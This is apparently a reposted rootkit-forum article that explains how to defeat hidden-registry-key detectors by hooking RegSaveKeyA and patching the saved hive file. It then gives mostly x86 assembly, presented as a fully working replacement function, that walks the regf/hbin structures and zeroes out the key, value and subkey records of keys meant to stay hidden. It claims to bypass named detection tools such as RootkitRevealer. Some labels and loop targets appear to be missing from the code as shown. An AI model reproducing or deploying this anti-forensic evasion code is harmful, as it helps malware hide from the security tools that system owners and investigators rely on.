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How to avoid the detection of hidden regkey by hooking RegSaveKeyA

2013年08月29日 ⁄ 综合 ⁄ 共 11206字 ⁄ 字号 评论关闭
How to avoid the detection of hidden regkey by hooking RegSaveKeyA

 By: EiNSTeiN_
How it works:
Many hidden-regkey-detection tools detect hidden stuff by dumping some
registry hives to a file and then compare it to what is returned by some
usualy-hooked function like NtEnumerateKey. Now the first problem is, if we
want to patch the file, is to read it, because the structure of a
registry hive is not documented by microsoft, and I actualy found only one
paper that describe it well enough to understand something.

Lets say we know how to correctly patch it, the question is wich functions
should we hook ? Why not hooking NtSaveKey (higher-level function) instead
of RegSaveKey ? This is the second problem. NtSaveKey (wich is called
internaly by RegSaveKey) take only the key hanlde and the file handle as

IN HANDLE KeyHandle,
IN HANDLE FileHandle

FileHandle must be a valid handle to a file object returned by a call to
CreateFile. Unfortunatly, the file is openend most of the time with only
WRITE access (NtSaveKey don't need READ access), and I don't know how to
add the missing READ access. If someone know PLEASE let me know :).

Now what about RagSaveKeyA :
RegSaveKeyA is called with the complete path of the file where to save the
hive, so we'll just have to call the original RegSaveKeyA and then re-open
the file and patch it. This just looks like what we need!

Limitation of the code:
The main way of bypassing this code is if someone dump the
HKLM/SYSTEM/CurrentControlSet/Services hive with RegSaveKey, restore it
with RegRestoreKey and then reboot the computer, all hidden services will
be removed.

You will also have to code a cmp_pchar_with_hidden_regkey_list fucntion,
wich the prototype looks like:
void cmp_pchar_with_hidden_regkey_list(char *keyname, int namesize);
return 1 if the key must be hidden, otherwise return 0

I hope i've been clear enough and everyone understood me, and sorry for my
poor english.

Here's a fully-working replacement function for RegSaveKeyA that bypass
FHS, rootkit revealer and knlsc.

Tested on XP Sp0 and Sp2

      push ebp
      mov ebp, esp
      sub esp, 028h
       -028            -        DWORD    address of the frist hbin block
       -024            -        DWORD    file opened
       -020            -        DWORD   current data-block addr
       -01C            -        DWORD    current data-block size
       -018            -        DWORD   offset to the next hbin block (size
of current block)
       -014            -        DWORD    address of the current hbin block
       -010            -        DWORD    total data-blocks size
       -00C            -        LPVOID    MappedView
       -008            -        HANDLE    MappedFile
       -004            -        BOOL    LResult
       +008            -        HANDLE    KeyHandle
       +00C            -        LPCTSTR
lpFile                                 //HANDLE FileHandle
       +010            -        LPSECURITY_ATTRIBUTES lpSecurityAttributes


      push 0
      push 0
      push OPEN_EXISTING
      push 0
      push 0
      push [ebp+00Ch]
      call [CreateFileA]
      cmp eax, -1 //INVALID_HANDLE_VALUE
      je go_ret
      /* msdn:
      If the function succeeds, the return value is an open handle to the
specified file.
      If the function fails, the return value is INVALID_HANDLE_VALUE.
      mov [ebp-024h], eax

      //call CreateFileMapping(File Handle)
      push 0                //name = NULL
      push 0 //[ebp-024h]    //size low
      push 0                //size high = 0
      push PAGE_READWRITE    //protect = read and write access
      push 0                //attributes = NULL
      push [ebp-024h]        //file handle
      call [CreateFileMapping]
      mov [ebp-008h], eax
      /* msdn:
      If the function succeeds, the return value is a handle to the file
mapping object.
      If the function fails, the return value is NULL.
      cmp dword ptr [ebp-008h], 0
      je  close_file

      //call MapViewOfFile(mapped file)
      push 0                            //bytes to map = 0 (map all)
      push 0                            //offset low = 0
      push 0                            //offset high = 0
      push FILE_MAP_READ|FILE_MAP_WRITE    //desired access
      push [ebp-008h]                    //file mapping object
      call [MapViewOfFile]
      mov [ebp-00Ch], eax
      /* msdn:
      If the function succeeds, the return value is the starting address of
the mapped view.
      If the function fails, the return value is NULL.
      cmp dword ptr [ebp-00Ch], 0
      je  close_map

      //now, patch the file !

      //first we check for the regf (registry file) header
      mov eax, [ebp-00Ch]
      mov edi, [eax]
      cmp edi, 066676572h // 'regf'
      jne unmap_view //seems to be not a registry file :s

      //save total size of all blocks
      mov edi, [eax+028h]
      mov [ebp-010h], edi
      //do some preparing for the upcoming loop
      mov [ebp-014h], eax
      mov dword ptr [ebp-018h], 01000h

      //save address of the first hbin block
      add eax, 01000h
      mov [ebp-028h], eax
      //jump to the next hbin block
      mov eax, [ebp-014h] //addr
      add eax, [ebp-018h] //size

      //confirm we got bin header block
      mov edi, [eax]
      cmp edi, 06E696268h // 'hbin'
      jne unmap_view //seems to be not a bin header :s

      //backup addr of current hbin block
      mov [ebp-014h], eax

      //save offset to the next hbin block
      mov edi, [eax+008h]
      mov [ebp-018h], edi
      cmp dword ptr [ebp-018h], 0
      je unmap_view //seems we have a hbin block with a size of zero. exit
for no deadlock

      //check if we reached the data-blocks size
      mov edi, [ebp-014h]
      sub edi, [ebp-00Ch]
      mov esi, [ebp-010h]
      cmp edi, esi
      jae unmap_view

      //do some preparing for the next loop
      mov [ebp-020h], eax
      mov dword ptr [ebp-01Ch], 020h
      //_emit 0xCC
      //jump to the next data-block
      mov eax, [ebp-020h] //addr
      add eax, [ebp-01Ch] //size

      //save current size
      mov edi, [eax]
      cmp edi, [ebp-018h]
      jb not_neg //if offset is inside the hbin block
      not edi
      inc edi
      lea edi, [edi-004]
      mov [ebp-01Ch], edi
      cmp dword ptr [ebp-01Ch], 0
      je process_next_hbin //seems we have a data-block with a size of
zero. go to next hbin for no deadlock

      //check for hbin block
      cmp dword ptr [eax], 06E696268h // 'hbin'
      je  process_next_hbin

      //save current address
      add eax, 4
      mov [ebp-020h], eax

      //check if we reached the data-blocks size
      mov edi, [ebp-014h]
      sub edi, [ebp-00Ch]
      mov esi, [ebp-010h]
      cmp edi, esi
      jae unmap_view

      //check for hbin block
      //cmp dword ptr [eax], 06E696268h // 'hbin'
      //je  process_next_hbin

      //check for nk
      cmp word ptr [eax], 06B6Eh // 'nk'
      //je  process_nk_block

      //found a block that we don't need to process now
      jne process_next_datablock
      //-------- end of loop

      //patch each blocks
      cmp word ptr [eax+002h], 02Ch
      je process_nk_block_rootkey //got a rootkey: we have nothing to do
with that
      cmp word ptr [eax+002h], 020h
      jne process_nk_block_end //got something else than what expected

      //process the key record

      xor ecx,ecx
      mov cx, word ptr [eax+048h]    //ecx = len
      lea edi, [eax+04Ch]            //edi = name

      //check if the key name must be hidden
      //if it is, fill the content of the key block and its value-blocks
with zeros. same for sub-keys
      push ecx //len
      push edi //name
      call [cmp_pchar_with_hidden_regkey_list]
      cmp eax, 1
      jne process_nk_block_end //not to hide, exit

      //call the nk cleaning function
      push [ebp-028h] //first hbin block
      push [ebp-020h] //nk block
      call [clean_nk]
      jmp process_nk_block_end

      // void clean_nk(PVOID nk_block, PVOID hbin_block);
      push ebp
      mov ebp, esp
      sub esp, 008h
        -010 subkeys list address
        -00C number of subkeys
        -008 value list address
        -004 number of values
        +008 address of nk block
        +00C address of hbin block (because all offsets are relative to
this block)
      push esi
      push edi
      push ecx

      //get the value list
      mov eax, [ebp+008h] //nk
      mov edi, [eax+028h] //offset to value list
      cmp edi, -1
      je clean_nk_subkey_start
      cmp edi, 0
      je clean_nk_subkey_start
      add edi, [ebp+00Ch] //hbin
      add edi, 4
      mov [ebp-008h], edi

      //get the value list size
      mov ecx, [edi-004h]
      not ecx
      inc ecx
      lea ecx, [ecx-004]
      mov [ebp-004h], ecx

      //clean it
      xor esi, esi
      mov edi, [ebp-008h] //value list addr
      mov eax, [edi+esi]  //address of entry
      cmp eax, -1
      je clean_nk_loop_end
      cmp eax, 0
      je clean_nk_loop_end
      add eax, [ebp+00Ch] //hbin

      push [ebp+00Ch]
      push eax        //address of vk entry
      call [clean_value]

      mov dword ptr [edi+esi], 0
      add esi, 4
      cmp ecx, esi
      ja clean_nk_loop_value

      //get sub-keys lf record
      mov eax, [ebp+008h] //nk block
      mov edi, [eax+01Ch] //offset to lf record
      cmp edi, -1
      je clean_nk_block_start
      cmp edi, 0
      je clean_nk_block_start
      add edi, [ebp+00Ch] //hbin block
      mov esi, [edi]
      not esi
      inc esi
      lea esi, [esi-004]
      lea esi, [esi-004]
      mov [ebp-00Ch], esi //number of subkey
      add edi, 8
      mov [ebp-010h], edi //address of subkey list

      //clean it
      mov ecx, esi
      xor esi, esi
      mov eax, [ebp+00Ch] //hbin
      mov edi, [ebp-010h] //value list addr
      add eax, [edi+esi]  //address of entry

      push [ebp+00Ch]
      add eax, 4
      push eax           //address of nk entry
      call [clean_nk]

      mov dword ptr [edi+esi], 0
      mov dword ptr [edi+esi+4], 0
      add esi, 8
      cmp ecx, esi
      ja clean_nk_loop_subkey

      mov edi, [ebp+008h]
      mov ecx, [edi-004]
      not ecx
      inc ecx
      lea ecx, [ecx-004]

      mov byte ptr [edi+ecx-1], 000h
      loop clean_nk_zero_next

      pop ecx
      pop edi
      pop esi
      ret 008h
      // ------------------ endp

      // void clean_value(PVOID vk_block, PVOID hbin_block);
      push ebp
      mov ebp, esp
      sub esp, 000h
        +008 address of vk block
        +00C address of hbin block
      push esi
      push edi
      push ecx

      //prepare for the loop
      mov esi, [ebp+008h]
      mov ecx, [esi] //size of block
      not ecx
      inc ecx
      lea ecx, [ecx-004]
      lea edi, [esi+004h]

      cmp word ptr [edi], 0x6B76 // 'vk'
      jne clean_value_end //check if we realy have a vk block

      cmp dword ptr [edi+00Ch], 4 //the data is stored in the offset field
      je no_data_to_clean

      mov esi, [edi+008h]
      cmp esi, 0
      je no_data_to_clean
      cmp esi, -1
      je no_data_to_clean
      add esi, [ebp+00Ch]
      push esi
      call [clean_vk_data]

      //ecx = size of vk block
      //edi = address of vk block
      mov byte ptr [edi+ecx-1], 000h
      loop clean_value_zero_next

      pop ecx
      pop edi
      pop esi
      ret 008h
      // ------------------ endp

      // void clean_vk_data(PVOID vk_data);
      push ebp
      mov ebp, esp
      sub esp, 000h
        +008 address of vk data
      push esi
      push edi
      push ecx

      mov edi, [ebp+008h]
      mov ecx, [edi]
      add edi, 4
      not ecx
      inc ecx
      lea ecx, [ecx-004]

      //ecx = size of vk block
      //edi = address of vk block
      mov byte ptr [edi+ecx-1], 000h
      loop clean_vk_data_zero_next

      pop ecx
      pop edi
      pop esi
      ret 004h
      // ------------------ endp

      jmp process_next_datablock

      //call UnmapViewOfFile(mapped view)
      push [ebp-00Ch]
      call [UnmapViewOfFile]

      //call CloseHandle(mapped file)
      push [ebp-008h]
      call [CloseHandle]

      push [ebp-024h]
      call [CloseHandle]
read comments (7) / write comment

recent comments:
typedefs & more details EiNSTeiN_ 24.Mar:20:12
Support Tools from Sysinternals.com kangeroo_4u 21.Mar:06:46
good,but.... ntsystem 20.Mar:16:36
work still needed on the code ... EiNSTeiN_ 20.Mar:16:32
BTW nice work! dsei 20.Mar:00:32
. . .
